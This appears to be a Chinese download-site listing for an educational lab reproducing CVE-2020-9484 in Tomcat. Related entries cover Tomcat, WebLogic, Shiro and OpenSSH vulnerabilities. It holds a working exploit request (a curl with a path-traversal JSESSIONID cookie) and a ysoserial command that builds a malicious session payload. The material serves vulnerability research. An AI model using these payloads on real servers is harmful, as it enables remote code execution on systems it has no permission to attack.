Advertisement

该漏洞(CVE-2020-9484)的源代码。

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None


简介:
CVE-2020-9484,针对Tomcat服务器的漏洞,仅供教育研究和学习目的使用。 详细的技术信息请参考提供的资料。 为了演示该漏洞的利用,可以按照以下步骤操作:首先,通过`git clone https://github.com/masahiro331/CVE-2020-9484.git`命令克隆漏洞代码仓库。 然后,进入 `CVE-2020-9484` 目录,并使用 `docker build -t tomcat:groovy` 命令构建 Docker 镜像。 接下来,通过 `docker run -d -p 8080:8080 tomcat:groovy` 命令运行 Docker 容器。 为了验证漏洞的存在,可以使用 `curl http://127.0.0.1:8080/index.jsp -H Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy` 命令发送请求。 随后,通过 `docker exec -it $CONTAINER /bin/sh` 命令进入容器的 shell 环境,并使用 `ls /tmp/rce` 命令列出 `/tmp` 目录下的文件和文件夹。

全部评论 (0)

还没有任何评论哟~
客服
客服
  • -CVE-2020-9484
    优质
    源码-CVE-2020-9484提供关于CVE-2020-9484漏洞的详细解析与利用代码,帮助安全研究人员深入理解该漏洞的工作原理及其潜在影响。 CVE-2020-9484(Tomcat) 仅用于教育目的。 运行以下命令: ``` $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy ``` 开发时使用: ``` $ curl http://127.0.0.1:8080/index.jsp -H Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy ``` 查看文件: ``` $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce ```
  • CVE-2020-9484: 使用Kali 2.0重现Apache Tomcat Session反序列化执行-
    优质
    本文详细介绍如何利用Kali Linux 2.0系统重现Apache Tomcat中的Session反序列化导致的代码执行安全漏洞,通过实际操作和源码分析帮助读者深入理解该漏洞的工作原理及防范措施。 复现Apache Tomcat Session反序列化代码执行漏洞CVE-2020-9484的步骤如下: 环境:使用Kali 2.0操作系统及apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(包含webapp s2-053,在其lib下添加了commons-collections4-4.0.jar)。 启动步骤: 1. 启动Tomcat:在终端中输入`/yourtomcatdir/bin/startup.sh` 2. 生成有效载荷:使用命令 `java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 touch /tmp/9484>/tmp/22222.session` 利用步骤: 1. 访问s2-053以确认服务是否正常运行。 2. 再次访问该webapp并抓包,使用intruder进行路径遍历测试。 3. 成功执行命令后即可验证漏洞已被触发。
  • CVE-2020-1938: 复现CVE-2020-1938
    优质
    本文章详细介绍如何复现CVE-2020-1938漏洞,为Apache Struts 2的安全研究人员和开发人员提供深入的技术指导。 CVE-2020-1938漏洞复现利用脚本:环境包括apache-tomcat-8.5.32、java和powershell;实验环境使用python启动tomcat,通过执行sh ./startup.sh来完成。请注意,该工具仅用于安全研究及内部自查目的,严禁将其用于非法攻击行为,任何由此造成的后果由使用者自行承担。
  • CVE-2020-9484.tar文件
    优质
    CVE-2020-9484.tar 是一个包含已知安全漏洞补丁及相关修复文件的压缩包,主要用于系统和软件的安全更新。 CVE-2020-9484 是一个影响 Tomcat 的 session 反序列化漏洞。通过使用 Docker 容器可以更方便快捷地进行该漏洞的分析与实验环境搭建,实现一键式操作及漏洞复现。这种方式非常值得尝试和应用。
  • WebLogic CVE-2020-14882 远程执行.zip
    优质
    本资料包包含针对CVE-2020-14882漏洞的分析与利用教程,该漏洞影响Oracle WebLogic Server,允许攻击者远程执行代码。适合安全研究人员学习参考。 学习记录笔记:CVE-2020-14882 WebLogic远程代码执行漏洞 一、WebLogic简介 二、漏洞描述 三、影响环境 四、环境搭建 五、漏洞复现 六、修复建议 以上六个部分涵盖了从了解WebLogic基础到详细记录如何进行CVE-2020-14882的漏洞学习,包括其对不同环境的影响分析和实际操作步骤。此外还包括了针对该漏洞的具体修复措施与建议。
  • OpenSSH(CVE-2020-15778, CVE-2018-15473, CVE-2018-15919)修复指南
    优质
    本指南针对CVE-2020-15778、CVE-2018-15473及CVE-2018-15919三个OpenSSH漏洞,提供详细的修复步骤和安全建议,帮助用户加强系统防护。 升级到OpenSSH 8.4可以修复低版本中的安全漏洞。为了完成此次升级,请确保安装以下软件包:openssl-1.1.1g、openssh-8.4p1以及zlib-1.2.11。
  • Windows SMB Ghost CVE-2020-0796解析1
    优质
    本文详细解析了Windows SMB中的CVE-2020-0796漏洞,包括其原理、影响范围及利用方式,并提供了防范建议。 验证程序首先创建与SMS服务器的会话连接。然后,验证程序获取自身token数据结构中的privilege成员在内核中的地址。
  • 截至2020年4月20日CVE情况
    优质
    该文档分析了截至2020年4月20日的各类CVE(常见漏洞披露)安全漏洞的情况,涵盖新增漏洞数量、受影响软件及系统、主要威胁类型等信息。 截至2020年4月20日的CVE漏洞整理齐全,下载方便,便于参考学习。
  • Apache Shiro身份验证绕过CVE-2020-13933)
    优质
    Apache Shiro是一款广泛使用的Java安全框架。近期发现其中存在一个关键的身份验证绕过漏洞(CVE-2020-13933),此高危漏洞可能被攻击者利用,从而未经授权访问系统资源或执行代码。务必及时更新至最新版本以防范风险。 直接使用 `java -jar spring....war` 命令运行即可执行之后,访问 http://主机的IP:8888/admin/* 或者 http://主机的IP:8888/login。